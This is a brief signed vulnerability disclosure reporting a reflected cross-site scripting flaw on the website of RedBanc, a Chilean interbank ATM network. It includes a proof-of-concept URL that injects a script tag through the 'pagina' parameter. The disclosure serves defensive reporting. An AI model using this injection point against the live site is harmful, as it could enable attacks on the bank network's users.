RedBanc.cl, the Chilean ATM / banking network, suffers from a cross site scripting vulnerability.
634b798cea85a277862662913608c23f4803894f0d226dcbc1387293e3d3a86a
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Redbanc is an interbank network[0] in Chile connecting the ATMs of 21 banks.
Site: https://www.redbanc.cl
XSS:
https://www.redbanc.cl/portal_redbanc/browse?pagina=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
PoC and more information (spanish):
https://blog.zerial.org/seguridad/vulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc/
[0] https://en.wikipedia.org/wiki/Interbank_network
- --
Fernando A. Lagos Berardi - Zerial
Desarrollador y Programador Web
Seguridad Informatica
GNU/Linux User #382319
Blog: https://blog.zerial.org
Skype: erzerial
Jabber: zerial@jabberes.org
GTalk: fernando@zerial.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - https://enigmail.mozdev.org/
iEYEARECAAYFAkuGiVMACgkQIP17Kywx9JSK4QCeJXD9NFlbEfD07/UshS8me7VI
WHEAni/nC+KM5X7b5ueKfxhBrTd7F/LA
=uwc+
-----END PGP SIGNATURE-----